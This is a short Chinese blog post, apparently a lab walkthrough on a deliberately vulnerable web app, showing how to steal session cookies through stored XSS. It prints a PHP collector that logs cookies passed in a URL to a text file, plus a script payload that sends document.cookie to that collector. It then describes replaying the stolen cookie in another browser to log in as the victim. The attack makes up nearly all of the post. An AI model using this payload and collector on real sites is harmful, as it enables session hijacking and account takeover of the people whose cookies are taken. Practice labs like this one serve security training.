利用XSS漏洞获取cookie

实验环境:

实验准备:

在www目录下创建一个名为1.php的文件,内容如下:

<?php
$file = fopen("1.txt","a");
if($_GET['cookie']){
$cookie = $_GET['cookie'];
fputs ($file,"$cookie\n");
}
?>

 

 

模拟实验:

1、把级别调成low,选择Stored储存型

 

 

<script>document.body.innerHTML += "<img src='http://localhost/1.php?cookie="+document.cookie+"'>";</script>输入到留言框中保存

 

 

在同目录下会生成1.txt文件,里面为成功登录的cookie

 

 

换个浏览器将cookie值改成文件中的值,然后把url改成index.php

 

 登录成功

 

posted @   晨起的太阳  阅读(644)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· 无需6万激活码!GitHub神秘组织3小时极速复刻Manus,手把手教你使用OpenManus搭建本
· C#/.NET/.NET Core优秀项目和框架2025年2月简报
· Manus爆火,是硬核还是营销?
· 一文读懂知识蒸馏
· 终于写完轮子一部分:tcp代理 了,记录一下
点击右上角即可分享
微信分享提示